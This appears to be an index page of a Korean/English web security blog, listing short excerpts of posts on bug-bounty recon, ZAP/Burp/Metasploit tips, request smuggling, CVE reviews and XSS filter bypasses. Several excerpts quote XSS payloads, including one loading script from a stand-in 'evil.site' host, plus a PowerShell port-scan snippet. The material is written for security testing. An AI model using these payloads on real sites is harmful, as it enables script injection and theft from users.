보안쪽에서 자주 나오는 사람 이름이 있습니다. 바로 앨리스(Alice)와 밥(Bob), 그리고 캐롤(Carol)인데요. 02랑 이야기하던 중 A/B/C 이야기가 나와 찾다보니 제가 아는 것 보다 종류가 훨씬 많고 각각 의미도 다 부여되어 있더군요. (전 그냥 알파벳 순서에 따라서 1~n번째 당사자라고 생각했는데..) ​ 알아...

HTTP/2 H2C Smuggling

Hi hackers and bugbounty hunter, This is written in Korean for Koreans. if you use english, look at the bishopfox’s original post is the best! 최근에 bishopfox에서 h2c smuggling 에 대한 이야기...

Future of the WebHackersWaepons

Concept feature in future So far I have been github repoing tools simply to enumerate them, but we’re thinking about how we’ll be able to easily install/uninstall/update the tools th...

Scanning multiple targets in ZAP

저는 ZAP과 Burp pro 모두를 사용하고 있습니다. 각각 도구가 가진 특성과 라이선스적인 문제로 인해서 같이 사용하고 있는데, 사실 누가 좋다고 우위를 가리기는 어렵습니다. (워낙 특성도 다르고, 각 도구가 바라보는 목표도 분명히 달라요) 그리고 종종 Burp/ZAP 두 도구의 Scanning 기능을 사용하곤 하는데,...

CI for Automatic recon

Hi hackers and bugbounty hunters 😁 CI/CD is a key topic in DevOps, DevSecOps. I’m also working on DevSecOps, so I’ve been thinking about it a lot and testing it. Meanwhile, I though...

Docker images and running commands of vulnerable web

I often use the weak web for performance testing of tools under development. I write post collection of docker commands for the execution of the vulnerable web. All docker image pul...

Transient events for XSS(sendBeacon?!)

I saw a new post in portswigger research today. It’s about how to successfully prove XSS when the attack phrase is blocked by WAF, but it’s short but interesting, so I’m writing it. ...

How to add custom header in ZAP and zap-cli

The zap-cli is a tool that helps make ZAP easy to use on the command line. From simple scanning to CI/CD Pipeline, it’s a tool that’s used everywhere. Unlike other scanners, it does ...

NMAP CheatSheet

Cullinan(Wiki) 프로젝트를 진행하면서 Cullinan - Nmap에 다시 정리해두었습니다. 해당 페이지가 최신이니 참고 부탁드려요 😎 Go-to command nmap -sC 192.168.0.1 (same this, nmap 192.168.0.1 --script=default) - 디폴트 스크립트로 대상 ...

Observe new subdomain (지속적으로 서브도메인 모니터링하기)

Hi hackers and bugbounty hunters. today I’m going to talk about findomain monitor options. Since the config option has been added, it is very simple to configure the monitoring envir...

pet and hack-pet. managing command snippets for security testing

Hi, hackers and bugbounty hunters :D Today, I’d like to talk about how to easily manage your command snippet, and even more about a project that can share and use snippets together....

One custom certificate, Using all tools and your devices (for bug bounty/pentesting)

저는 Burp pro / ZAP / Cli base proxy 3가지 모두를 사용합니다. 단순히 웹만 테스팅할 땐 크게 와닿지 않지만, 모바일을 테스트할 땐 인증서가 상당히 귀찮습니다. (특히 임시로 사용하는 폰들은..) 그래서 올해부터 Burp / ZAP 등의 기본 인증서가 아닌 별도로 인증서를 생성해서 모든 테스팅 기기...

Bypassing string base XSS protection with Optional chaining

Hi hackers and bugbounty hunters :D Today, I share very very very simple tip for xss. (style=undefined) I found an interesting XSS code while reading your tweet. 트윗을 보다가 재미있어 보...

E-mail 포맷을 이용한 여러가지 Exploiting 기법들

Recently, the nahamcon2020 was in over. I difficult to watching it in my time zone, so I just looked at the documents after it’s over. They were all very interesting and I learned...

Setup bugbounty hunting env on termux :D

The termux in my memory was Linux on Android, which was only available with some Linux commands. So I usually remember using it on rooting device. Recently, I found out that package...

Vulnerability of postMessage and postMesasge-tracker browser extension

Hi hackers and bugbounty hunter! Recently, @frans released a browser extension called postMessage-tracker and I found it. So today I’m wrting about the expansion and postMessage. fr...

Find reflected parameter on ZAP for XSS!

올해부터 버그바운티 시 사용하기 좋은 웹 해킹 도구들을 정리하고 있습니다. 그중엔 BurpSuite와 ZAP의 확장 기능 컬렉션도 있고 트윗통해 추천을 받던 중 쓸만한 ZAP 확장 기능을 찾아 글로 간략하게 작성해봅니다. Hi hacker and bugbounty hunters. Starting this year, I m...

How to use DalFox's Fun Options (if found notify , custom grepping)

As you can see from my blog and tweet, I recently full-change(new project…) my XSpear and created an XSS Scanning tool called DalFox. Today, I’m going to share some tips for using Da...

New my XSS scanning tool - DalFox

Hi, hackers and bugbounty hunters 👋🏼 Today I’m going to talk about my new XSS tool, DalFox. I’m sure there are a lot of bugs because it’s still under development, but I’m going to t...

How to import external spidering output to Burpsuite or ZAP

Normally, BurpSuite or ZAP is the main tool of testing during bugbounty or security testing. It’s good to navigate directly with the spider function in there, but sometimes you need ...

Recon using fzf and other tools. for bugbounty

때때로 버그바운티를 하다보면, 굉장히 많은 파일을 만나게 됩니다. 특히 meg, gospider 등 recon 도구를 사용한 결과의 양은 상상을 초월합니다. Hi hackers and bugbounty hunters. today, I’m going to share with you how to use fzf for bugbo...

Ways to XSS without parentheses

Introduction 간만에 @garethheyes 가 굉장히 쓸만한 테크닉을 하나 공유했습니다. DOMMatrix 를 이용해서 괄호 검증을 나가는 방법이고, 기존에 사용하던 방법들에 어려움이 있을 때 참고해볼만한 기법입니다. 꼭 한번 읽어보세요.! https://portswigger.net/research/java...

Find S3 bucket takeover , S3 Misconfiguration using pipelining(s3reverse/meg/gf/s3scanner)

Hi hackers! Today, i’m going to talk about easy-to-find methods using S3 Bucket takeover and Misconfiguration (Write/Read…). 오랜만에 글을 쓰는 것 같네요. 요즘 코로나19로 인해 재택근무를 한달넘짓 한 것 같은데, 평소보다 일...

Recon with waybackmachine. For BugBounty!

I’m busy with work these days, so I think I’m writing in two weeks. (Actually, I couldn’t write it because I was tired. LOL) Today I’m going to share a tip that I used a lot on bugbo...

Using the Flat Darcula theme(dark mode) in ZAP!!

트위터를 보던 중 사이먼의 어마어마한 트윗을 보게되었습니다. 바로 ZAP의 Dark 모드 지원에 대한 이야기였는데요. 가볍게 리트윗했더니 이미 commit 된 내용이고 바로 사용해 볼 수 있다고 합니다. 그래서 아직 Weekly 버전에도 반영되지 않았지만, 미리 체험해보기로 하겠습니다. Commit? 아마 이 커밋인 것...

Find testing point using tomnomnom's tool, for bugbounty!

I recently watched a video that looked for inspection points in a unique way from Stok’s video(interviewed tomnomnom) So, today, I’m going to introduce you to some of the tools and t...

XSpear 1.4 Released! Find XSS! (Supported HTML report now!)

Hi Hackers and Bugbounty hunters! I planned XSpear for version 1.4 by February and I’m glad to be able to complete it within the time frame. This update adds several features and HT...

First new XSS Payload of 2020(svg animate, onpointerrawupdate)

Hi hackers and bugbounty hunter! Recently, two previously unknown XSS Payloads were disclosure one after another. It’s not a payload that’s very difficult to understand, so I’ll shar...

BurpSuite 2020.01 Release Review, Change HTTP Message Editor!

The first release of Burp 2020.01 was released recently. I think end of last year, the Navigation Embedded Browser in the 2.1.05 release may not be a big change because of its impact...

Metasploit의 목소리가 궁금하다면 sounds 플러그인!

새벽에 심심해서 Metasploit 가지고 놀던 중 의외의 이름의 플러그인 하나를 발견했습니다. Sound???? 사운드 관련된 기능을 테스트하는 플러그인인지 이상한 추측만 해봤지만, 우선은 로드하여 사용해 보면서 파악하기로 했습니다. 테스트 msf6 > load sounds [*] Successfully loa...

Metasploit에서 Database connection이 자주 끊긴다면?

간혹 Metasploit을 사용하고 있으면 갑자기 DB Connection이 사라지곤합니다. 제 환경에서도 특정 PC에서 유독 잘 끊어지는데요, 간단한 트릭으로 쉽게 해결이 가능합니다. Database not connected Timeout 기본적으로 Metasploit의 DB 설정에는 timetout이 5로 잡혀...

Write Metasploit Module in Golang

Metaploit에서 2018년 12월부터 golang module 지원이 시작되었습니다. 저도 잘 모르고 있다가 최근에서야 알게 되었네요. Contributing modules in GO can be achieved in a few simple steps as outlined below. As for supporte...

How to find important information in github(with gitrob)

Today.. I write in “how to find important information in github(with gitrob)”. It’s a very simple article, just introduction… Install and Github AccessToken Setting First, downlo...

Cookie and SameSite

올 2월부터 Chrome 브라우저에서 SameSite=Lax가 기본값으로 변경됩니다. Early October, 2019: Experimental SameSite-by-default and SameSite=None-requires-Secure behavior launched to 50% of users on Chrom...

JSON Hijacking, SOP Bypass Technic with Cache-Control

Today, I write post at technique that bypasses SOP using cache during JSON Hijacking. It’s not always available because conditions are necessary, but if the conditions are right, yo...

Stepper! Evolution repeater on Burp suite

오늘은 Burp suite의 확장 기능 하나를 소개할까 합니다. 개인적으로 최근에 찾은 것 중에 정말 쓸만하다고 느끼는 확장 기능입니다. Stepper(https://github.com/CoreyD97/Stepper )입니다. What is Stepper? Stepper는 기존 Repeater의 개선 버전 정도로 ...

XSpear 1.3 version released!

Hi hackers! I worked hard to finish the XSpear 1.3 version with this year’s last release. and, 1.3 version released! Key features included in this update include: 1) There was a...

BurpSuite에서 Request 정보를 포함하여 CLI 앱 실행하기)

오늘은 Burp suite에서 외부 앱을 실행하는 방법에 대해 이야기하려고 합니다. 사실 비슷한 내용(ZAP)으로 예전에 글을 쓴적이 있었는데요, 드디어 관련 확장 기능이 업데이트되어서 Burp suite에서도 동일한 짓을 할 수 있습니다. Today I’am going to talk about how to run an e...

Test with GoBuster! (Powerful bruteforcing tool of golang)

directory 스캔 도구의 dirbuster가 아주 강세였습니다만, 올해부터 gobuster가 더 많이쓰이는 것 같은 느낌이 듭니다. 당연히 스캔 도구는 이젠 golang이 압도적일겁니다. (고루틴과 고채널의 힘이란..) The directory scan tool’s dirbuster has been very strong...

Burp Beautifier - Beautifying JSON/JS/HTML/XML In Burp Suite

오늘은 빠르게 Burp Extension 하나 소개할까 합니다. Today, I will introduce a Burp Extension. Burp Beautifier 라는 확장 기능인데 Burp 내부에 Beautifier가 생깁니다. 보통은 온라인에 만들어진 JS Beautifier 나 JSON Beautifier를 사...

Arachni scanner에서 Webhook으로 Slack 연동하기(Send msg to slack when arachni scan is complete)

Arachni는 성능 좋은 웹 취약점 스캐너임과 동시에 CI/CD 및 확장성이 굉장히 좋습니다. Web-UI, REST Server , RPCd, Cli, Interactive Shell 지원하는 것만 봐도 개발자가 엄청 신경썼다는게 느껴지지요. Arachni is powerful scanner of universe. ...

How to find End-point URL in Javascript with LinkFinder

@ZracheSs-AnasZ 의 트윗을 보다가 아주 괜찮은 툴을 알게되어 공유합니다. I’ve seen the tweet from @ZracheSs-AnasZ yesterday, and I got to know awesome tool and I share it now LinkFinder? 이름 그대로 링크를 찾아주는...

Easy command for find iOS Application directory on Jailed Device

Unlike Android, iOS has a random pattern of directory names for each app. This is a little annoying when analyzing it. but you can simply check it out by using the commands below....

Two easy ways to get a list of scopes from a hackerone

Hi hackers, I write post for easy get bugbounty target scope. simple 2 way. 해커원 버그바운티 프로그램들을 보면 타겟 도메인이 굉장히 많은 경우가 있습니다. 매번 Scope 처리하거나, 테스트 할 때 확인하기 불편한감이 있는데, 이를 쉽게 처리할 수 있는 2가지 방법...

Check logic vulnerability point using GET/HEAD in Ruby on Rails

최근에 Github OAuth flow bypass 취약점이 공개되었습니다. 이 취약점은 Rails 앱의 특성을 이용한 취약점이고, Github만의 문제가 아니고 패치로 모든 Rails 앱을 보호할 수도 없습니다. Today, I going to review one vulnerability that needs to be ch...

How to diable detectportal.firefox.com in firefox(enemy of burpsuite)

When i hack the web with proxy tools like Firefox + Burp suite or ZAP, there’s a very annoying request. 파이어폭스와 Burp suite, ZAP 등의 프록시 도구로 테스트를 하다보면, 굉장히 거슬리는 요청이 있습니다. http://detect...

Burp suite using Tor network

버그 바운티를 하다보면, 간혹 차단되는 경우가 있습니다. 다시 차단을 우회하고 접속할 수 있는 방법에는 여러가지가 있으나 tor를 이용하면 간단하게 처리할 수 있습니다. Sometimes, when you do a bug bounty, network block me from target’s security team… The...

Navigation with Embedded Browser on Burp suite 2.1.05(new releases)

Today’s blog post is written only in Korean. This is brief information about the release notes. if you need english, just see release note or translate please. (http://releases.ports...

Upgrade self XSS to Exploitable XSS an 3 Ways Technic

오늘은 Self-XSS를 유효한 XSS로 업그레이드 하는 방법 3가지에 대해 이야기 할까 합니다. Self XSS 공격자가 피해자인 XSS입니다. 즉 본인만 볼 수 있는 페이지의 XSS이며, 보통 버그바운티에선 영향없는건으로 리워드 대상이 아닙니다. 기업보안 입장에선 당연히 같이 체크해야하는 부분이구요. XSS Vuln...

웹 소켓의 새로운 공격 기법! WebSocket Connection Smuggling 😈

오늘은 WebSocket Connection Smuggling에 대한 이야기를 할까 합니다. Hacktivity 2019 컨퍼런스에서 발표된 내용이고, 신기한거 같아서 몇번 테스트해보니 실제 케이스에서 발생할 수 있는 문제로 보이네요.. (저 멀리 헝가리에서 하는 컨퍼런스라 가본적도 없고한데, 볼만한 내용들이 좀 있네요!) ...

PHP7 UnderFlow RCE Vulnerabliity(CVE-2019-11043) 간단 분석

일주일전에 PHP FPM 취약점 관련 내용 및 PoC가 공개되었습니다. RCE가 가능하고, PoC가 워낙 잘 나온 케이스라 아마 대다수가 긴급으로 대응하지 않았을까 싶습니다. 해당 취약점을 정확하게 이해한건 아닙니다.. 현재까지 이해한 수준에서 글로 작성해봅니다……. @_@ Impact & Solution 7....

CPDoS(Cache Poisoned Denial of Service) Attack for Korean

최근에 CPDos에 대한 이야기가 핫합니다. HTTP Desync Attack 때 이미 경험했던 부분이지만, 여러모로 이슈화 되다보니 일적으로나 개인적으로나 테스트를 좀(강제로..) 해보게 되었네요. 아무튼 오늘은 CPDoS에 대해서 간략하게 글로 남겨두려고 합니다. (알비노왁스가 페이팔에 이 취약점으로 제보했었는데, 관련...

Find Subdomain Takeover with Amass + SubJack

Subdomain takeover was once a very popular vulnerability. It’s still constantly being discovered. Of course, there are so many hackers running automated code that it’s hard to actual...

jwt-cracker를 이용한 secret key crack

JWT는 내용에 대한 서명을 내용 뒤에 붙여주어 위변조를 감지할 수 있습니다. 간혹 secret이 간단하게 설정된 경우에는 secret을 찾고 변조된 JWT를 만들 수 있는데, 이를 인증에 사용하거나 중요 로직에서 데이터를 읽어 사용하는 경우 큰 보안적인 리스크를 가지게됩니다. 보통은 Key Confusion이나 Signa...

Bypass referer check logic for CSRF

Referer header check is probably the most frequently used CSRF countermeasure. It’s easier to implement and less performance issues than the token approach, so it’s the preferred app...

New Technic of HTTP Desync Attack

After the HTTP Desync Attack announcement, the bugbounty hunters and corporate security personnel seem to be very busy. Albino recently announced that he would be writing additional ...

If you find powerful OXML XXE tool? it's "DOCEM"

XXE 테스트 시 쓸만한 도구 하나 찾아서 공유드립니다. 직접 노가다하거나 기존에 공개됬던 툴보단 훨씬 편리할 것 같습니다. When I tested OXML XXE, OOXML XXE, I used to create payload myself or used this tool. Recently, i found powerf...

Normalized Stored XSS (\\xef\\xbc\\x9c => \\x3c)

해커원 보고서를 읽던 중 재미있는 XSS 취약점이 있어 공유해봅니다. https://hackerone.com/reports/639684 Normalized XSS =[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕ What is < 페이로...

Path Traversal pattern of ../

Path traversal 페이로드 관련해서 툴 사용이 어려울 때 매번 타이핑하기 귀찮아서 하나 만들어두고 쓰고 이었습니다. cheatsheet쪽에 정리하려다가, 아직 개편(진행중이랍니다..)중이고 이후에 어떤 형태로 나타낼지 자리잡히지 않아서 글로 미리 작성해둡니다. Path Traversal pattern of ../ ...

Bypass host validation Technique in Android (Common+Golden+MyThink)

SSRF, CSRF, Open Redirect 등 사용자로부터 입력받은 URL을 검증해야할 일은 많습니다. 직접 검증 로직을 하나하나 구현하는 방법도 있지만, 보통은 각 언어에서 제공하는 메소드를 통해 host, scheme를 분리한 후 검증하는 것이 좋은 방법입니다. 오늘은 Android에서 Host 검증(URL검증)을 ...

OWASP Amass - DNS Enum/Network Mapping

OWASP Amass는 OWASP에서 go로 만든 DNS Enum, Network Mapping 도구이자 Project입니다. Recon, OSINT 도구로 보시면 될듯하고 성능은 아직 체감상 느껴지진 않으나 지원하는 기능의 범위가 넓어서 활용도가 높은 프로그램으로 생각됩니다. DNS, Scaraping, APIs(외부AP...

Burp collaborator 인증서 에러 해결하기(certificate error solution)

Burp를 쓰다보면 간혹 이런 에러를 만날 수 있습니다. (하필 중요한 콜라보레이터에서 ㅜㅜ) The Burp Collaborator server used by the Burp Collaborator client is not reachable. change the setting… Why problem? Burp sui...

Burp suite pro 구매기(for korean, 개인 증명 관련 문제 처리방법?)

음.. 개인적인 분석 환경을 이야기하자면 회사에선 Burp pro + ZAP 개인으론 ZAP + Burp CE 였습니다. 물론 burp pro~ent가 좋다는건 알고 있었으나 최근 burp 2.0 이후부터 그 갭 차이가 좀 많이 커진다는 느낌을 받았습니다. (개인적으론 ZAP의 Deamon화 추친하는 방향이 장점도 있...

Bypass blank,slash filter for XSS

⚠️ XSS에 대한 전반적인 내용은 Cullinan > XSS 페이지에서 관리하고 있습니다. 해당 페이지에서 최신 데이터가 유지되니 참고 부탁드려요 :D Hi, hackers. The XSS pattern I’m going to talk to you about today… but It’s not a new t...

HTTP Desync Attack 에 대해 알아보자(HTTP Smuggling attack re-born, +My case)

Today’s content is Korean content for HTTP Desync Attacks. Based on the link below to this article. and can get more accurate information by referring to the this document. 최근에 Port...

onload*(start/end) event handler XSS(Any browser)

Hi hackers. Last time I wrote about onpointer * xss, I write a not well-known event-handle for xss now. (https://www.hahwul.com/2019/07/onpoint-xss-payload-for-bypass-xss-protection...

onpoint* XSS Payload for bypass blacklist base event-handler xss filter

Hi hackers. I crafted XSS payloads for bypass event handler protection. it is just simple code. onpoint* is an event handler for pointing devices (such as tablets). It has actions s...

JSONP Hijacking

Hi hackers. It’s a long time I didn’t write blog post. I found JSONP Hijacking a not SOP case. I’m going to briefly explain it. 오랜만에 SOP우회가 아닌 JSONP Hijacking 발견해서 간략하게 내용 풀어봅니다. Th...

Event handler for mobile used in XSS (ontouch*)

Some event handlers do not appear in the OWASP list. It is a touch event like ontouch*. It is a limited item on mobile devices, so it has a less effective effect than general purpose...

HTTP Request(ZAP, Burp) Parsing on Ruby code

XSpear 관련해서 이런 건의사항이 하나 있었습니다. Burp, ZAP 등에서 사용하는 패킷 데이터를 파일로 저장한 후 옵션을 주어 읽으면 자동으로 URL, Header 등을 파싱해서 사용하는 형태를 말씀하신 것 같습니다.(마치 sqlmap의 그것 처럼) 간단하게 처리를 위한 로직 작성해서 블로그 글로 남겨둡니다. 실제로...

XSS payload for escaping the string in JavaScript

오늘 오후쯤 신기한 페이로드를 하나 찾아서 메모해뒀다가 글로 작성해봅니다. 아마도 자바스크립트 내부에 코드가 삽입되었지만 문자열을 탈출할 수 없을 때 사용할 수 있으며 이런 형태의 패턴이 들어가는 곳도 은근히 있을 것 같습니다. XSS Payload @_zulln이 최근에 신기한 XSS 페이로드를 하나 공개했습니다. &l...

ZAP Send to Any tools(+Send to Burp Scanner)

Hi friends?! I shared post the applications settings in ZAP yesterday. I’m going to share some of the settings that I was writing separately today. Let’s get started, my go-to settin...

How to use SDCard directory in Termux(not rooted)

Use sdcard directory on Termux 1) run termux-setup-storage command on termux terminal termux-setup-storage 2) Move to $HOME/storage directory(this is sdcard directory) cd ~/stor...

Run other application in ZAP 🎯

ZAP has one interesting feature. It is a function that can use external applications. This makes it easier and more powerful for security testing to work with external tools. Today’s...

OAuth 과정에서 발생할 수 있는 재미있는 인증토큰 탈취 취약점(Chained Bugs to Leak Oauth Token) Review

오늘 OAuth 관련 버그바운티 재미있는건을 봐서 포스팅으로 풀어봅니다. 간단히 요약하면 우버와 페북 OAuth 과정 중 문제가 있어서 사용자 인증정보를 공격자에게 탈취할 수 있는 부분이였고 리포팅한 @ngalog 는 $7,500나 받았다고 하죠. 알고보니 우버팀도 이 취약점을 재미있게 보아서 아주 awesome하다고 극찬...

XSS Payload without Anything

What is XSS Payload without Anything? When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am d...

GraphQLmap - testing graphql endpoint for pentesting & bugbounty

밤에 트윗보다보니 swissky가 툴 하나를 만들어서 배포했더군요. 심지어 GraphQL 관련 자동화도구라 바로 대충 정리해서 포스팅해봅니다. GraphQLmap 입니다. 아 swissky는 Payload All the Things을 만든.. 대단한 친구죠 :) What is GraphQL? GraphQL 은 페북에서...

Ruby on Rails Double-Tap 취약점(CVE-2019-5418, CVE-2019-5420)

간만에 취약점 리뷰해봅니다. 올 봄에 정리한번하고 최근에 추가로 정리했던거라 머리속에서 날아가기 전에 블로그 글로 남겨보아요. 우선 올 해 3월 정도에 레일즈 관련 취약점이 3개정도 올라왔었습니다. CVE-2019-5418 ~ 5420 이슈인데, 결과적으론 Rails에서 시스템 파일을 읽고, 명령 실행까지 가능한 3가지였습니...

ZAP에서 Request/Respsponse 깔끔하게 보기

Problem ZAP에서 Burp의 Repeater와 비슷한 역할을 하는 도구가 Requester라는 확장기능입니다. (내장 기능도 있지만 여러모로 부족하죠.) 이 Request를 쓸 때 가장 큰 단점이 Request/Response를 동시에 보는 패널 모드를 적용하면 아래와 같이 난잡하게 Request/Response...

Finding in-page scripts & map files with javascript (very simple..)

별 코드는 아니지만 만들어 놓고 쓰면 편하니.. 페이지에 있는 외부 스크립트 링크와 map 파일 링크 볼 수 있습니다. (map은 그냥 무조건 나타나게..) function scripts() { var scripts = document.scripts Object.values(scripts).forEach(fu...

Tap n Ghost Attack(탭 앤 고스트) - 새로운 물리적(?) 해킹 공격 벡터

지난주인가 지지난주인가 이 내용을 보고 아주아주아주아주 대충 초안을 써놨었는데, 이제서야 글로 포스팅하네요. 오늘은 물리적인 해킹 기법의 새로운 공격 벡터인 탭 앤 고스트(Tap n Ghost) 공격에 대해 알아볼까 합니다. 그럼 시작하죠. What is Tap n Ghost? NFC(Near Field Communica...

ZAP 2.8 Review ⚡️

드디어, 정말 드디어 ZAP 2.8이 릴리즈 되었습니다. 어제 새벽에 simon이 2.8 릴리즈 프로세스를 시작했다고 했고, 테스트만 마치면 바로 릴리즈 된다고 했었는데요, 그러고 한 6시간 뒤 공식적으로 2.8이 스탠다드 버전이 되었습니다. 이젠 스탠다드 버전에서 HUD 기능을 비롯해 여러가지 추가된 기능을 사용해 ...

Frequently used frida scripts and others..

I’ve posted some frequently used Freda scripts. Honestly, I like cordshares, but sometimes I need them(raw script, link, etc…). General Information Docs https://www.frida.re/docs/h...

How to fuzzing with regex on ZAP Fuzzer

ZAP Fuzzer is a very useful tool for reply attack, brute force, and multiple entropy calculations. Personally, I think it’s better than the burp suite intruder (it’s more flexible). ...

ZAP에서 정규표현식을 이용하여 웹 퍼징하기

ZAP의 Fuzzer는 reply attack, brute force 및 여러 엔트로피 계산에 있어 굉장히 유용한 도구입니다. 개인적으로는 Burp suite의 intruder보다 더 유연하다고 생각되네요. ZAP Fuzzer에서 Regex을 이용해서 페이로드 리스트를 만들고 테스트할 수 있는데, 오늘은 그 이야기를 좀 해볼...

Four XSS Payloads - Bypass the tag base protection

Hey, guys. I wrote about xmp xss last April. At that time, there was a story about writing in English and finish test all vector , so I wrote a story about the attack vector. https...

침투테스트 약간 유용한 nmap NSE 스크립트 4가지

오늘은 nmap NSE 스크립트 4개에 대해 글 작성해봅니다. 음, 초안?은 좀 써놓은지 되었는데, 최근에 여러모로 신경쓸일이 많아서 이제서야 글 올리게되네요. 우선, 신박한 내용은 아니고 그냥 보편적으로 많이들 쓰시는 스크립트 4개정도 추려봤습니다. 혹시나 좋은 스크립트를 아신다면 댓글로 공유해주시면 정말 감사하겠습니다 :...

Four nmap NSE scripts for penetration testing.

Today, I write simple blog post to my go-to four nmap NSE scripts for penetration testing. Maybe it’s something everyone knows, but I hope you have fun. Let’s start! dns-brute.nse ...

AutoSource - Automated Source Code Review Framework Integrated With SonarQube

kitploit 보다가 소스코드 분석 도구 관련 내용(https://www.kitploit.com/2019/05/autosource-automated-source-code-review.html) 있어서 깃들어가서 좀 찾아봣습니다. 음 .. 솔직히 리뷰할 정도의 도구는 아닌데 보다보니 소나큐브 관련해서 이야기도 할겸 글로 작...

CVE-2019-11358를 통해 Prototype Pollution을 알아보자

자 과연 이 코드는 정상적인걸까요? myObj, newObj는 다른데 어떻게 같은 값을 가질 수 있지? 란 의문이 드실 수 있습니다. let myObj = {} myObj['__proto__']['a'] = 'a’ console.log(myObj.a) let newObj = {} console.log(newObj....

Testing command(curl, wget, portscan, ssh) with Powershell

curl Invoke-WebRequest -Uri https://www.google.com wget Get-WebFile https://www.google.com out.html portscan 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("1...

How to protect iframe XSS&XFS using sandbox attribute(+CSP)

iframe에는 sandbox라는 속성이 하나 있습니다. 이는 iframe 사용에 있어서 좀 더 안전하게 사용할 수 있도록 보조해주는 정책인데요, CSP와 함께 잘 사용된다면 굉장히 튼튼한 iframe 정책을 유지할 수 있어집니다. 오늘은 iframe sandbox에 대한 이야기를 할까 합니다. iframe sandbox...

ZAP(Zed Attack Proxy)의 4가지 모드(Four modes of ZAP)

ZAP을 처음 썼을 때 딱 바로 궁금했던게 있었습니다. 바로 좌측 상단의 Mode들인데요, 찾아볼까 하다가 그냥 넘어갔었는데, 드디어… 대충 어떤건지 글로 작성해봅니다. Safe mode 위험한 액션은 모두 제외된 상태, 단순하게 proxy로써의 기능에 충실한 모드 *위험한 액션으로 분류된 기능들 Spider Acti...

Jailbreak iOS Cydia 내 설치/업데이트 시 gzip:iphoneos-arm 에러 해결방법

iPad 하나를 거의 테스트 기기처럼 쓰고 있습니다. 이를 위해서 이전에 탈옥을 시켜두었는데 하나 고질적인 문제가 있었죠. 바로 Cydia에서 앱 설치를 하거나 업데이트를 하려고 하면 아래와 같은 에러가 발생했습니다. Could not configure 'tar:iphoneos-arm'. Could not perform i...

Bypass XSS Protection with xmp/noscript/noframes/iframe

최근 트위터 에서 이런 XSS 코드가 좀 도는 것 같습니다. <xmp><p title="</xmp><svg/onload=alert(45)>"> 조금 된 기법이긴하나 그래도 기존의 XSS 방식을 우회할 수 있는 여지가 큰 방법이라 간간히 이를 이용한 XSS들이 보이는데요. 이런케...

Metasploit에서 커스텀 배너 만들기

메타스플로잇에서 커스텀 배너를 만드는 2가지 방법입니다. Use MSFLOGO Env 첫번째 방법은 배너로 사용할 파일을 저장해두고, MSFLOGO라는 환경변수에 넣어서 적용하는 방법입니다. 배너는 Ascii art 사이트들을 참고하면 예쁘게 만들 수 있습니다. export MSFLOGO=~/test/logo.txt ...

Access-Control-Allow-Origin가 wildcard(*)일 때 왜 인증 정보를 포함한 요청은 실패하는가 😫

TL;DR CORS 정책 상 Access-Control-Allow-Origin: * 인 경우 Origin의 제한없이 요청하고 결과를 읽을 수 있지만, 이러한 경우 쿠키를 제거하고 요청하도록 정책이 구성되어 있어서 인증 정보를 포함한 요청에서는 불가능합니다. 만약 쿠키 없이 호출하기 위해선 xhrFields에 withCred...

robots.txt에 대해 제대로 알아보자. (What is robots.txt?)

이번 금요일에 친한 동생이랑 robots.txt 가지고 이야기 하다보니 제가 정확하게 모르고 있던 부분들이 있었더군요. 사건의 발단 그래서.. 정리도 해볼겸 블로그 글로 작성해봅니다. robots.txt란? robots.txt는 웹 크롤...

MacOS에서 Proxy 설정하기(for ZAP, BurpSuite)

MacOS에서 프록시 설정하는 방법 메모해둘까 합니다. 사실 뭐 별다른건 아니고.. 다른 OS에서 직접 설정하는 것과 동일합니다. 다만 MacOS의 경우 좀 더 On/Off가 쉬운 편이라 별도의 프로그램이 필요하단 느낌을 받진 않았네요. 네트워크 설정에서 HTTP/HTTPS Proxy 설정하기 네트워크 설정 메뉴에 들어가...

ffmpeg를 이용한 mp3 파일 metadata 수정하기(Edit metadata in mp3 using ffmpeg)

테스트 중 mp3 파일에 metadata 편집할일이 있어서 exiftool로 수정하는데 이런 에러가 났습니다. exiftool -artist=“hahwul<br>11" a.mp3 Error: Writing of MP3 files is not yet supported - a.mp3 0 image files ...

🦁 Brave Browser = 보안 + 속도 + 새로운 시도

최근에 브라우저 하나를 접했습니다. 바로 Brave라는 웹 브라우저인데요, 지금까지 쓰던 오페라를 한번에 밀어내고 Safari, Firefox와 함께 저의 주력 브라우저로 선택되었습니다. 오늘은 Brave 브라우저에 대한 리뷰 그리고 제 생각을 이야기드릴까 합니다. Brave Browser? 우선 Brave softwar...

느린 ZAP을 빠르게 만들자! Zed Attack Proxy 최적화하기

취약점 분석에서 필수적으로 사용되는 도구 중 하나인 ZAP(or Burp 이지만, 이번 포스팅에선 ZAP만 다룹니다)은 많은 기능을 가지고 있지만, 모든 기능을 한번에 사용하기에는 확실히 속도를 걱정하지 않을 수가 없습니다. 우선 Java App으로 JVM 위에서 동작하고, 기본적인 동작 자체도 굉장히 느릴뿐더러 기본적...

Metasploit-framework install & Setting on MacOS

macos에서 Metasploit-framework 설치하는 방법에 대해 메모합니다. 음 솔직히 리눅스 버전이랑 거의 동일한 것 같은데, 최근 버전이라 그런가 path나 db 설정도 자동으로 해주네요.. (오.. 소스코드 받아서 하다가 패키지로 바꾸니깐 신세계) Install metasploit-framework for m...

Bypass domain check protection with data: for XSS

오늘은.. 버그바운티 하다가 이런 형태의 XSS 코드도 가능하길래 공유드려봅니다. <script src="data://www.trustdomain.hahwul.com, alert(45)"></script> 선행조건(Prerequisites) 구문이 script src에 들어가는 경우(If...

XSStrike geckodriver no such file error 해결하기

XSStrike를 맥에서 쓰려고 하니 이런 에러가 나타났었습니다. (보통은 리눅스에서 작업을 많이 했어가지고.. ) Traceback (most recent call last): File "/usr/local/lib/python3.7/site-packages/selenium/webdriver/common/service....

File content Disclosure & DOS Vulnerability in Action View of Ruby on Rails(CVE-2019-5418,CVE-2019-5419)

지난주에 github에서 보안 관련 노티를 받았었는데 영향도를 보고 조금 놀랬습니다.. (critical severity 라니…) 아무튼 둘 다 CVE 넘버링이 있는건이고, 5418의 경우 시스템 파일이 유출될 수도 있어 좀 중요해보이긴합니다. 요약하면 이렇습니다. CVE-2019-5418 : File Content D...

Kage(GUI Base Metasploit Session Handler) Review

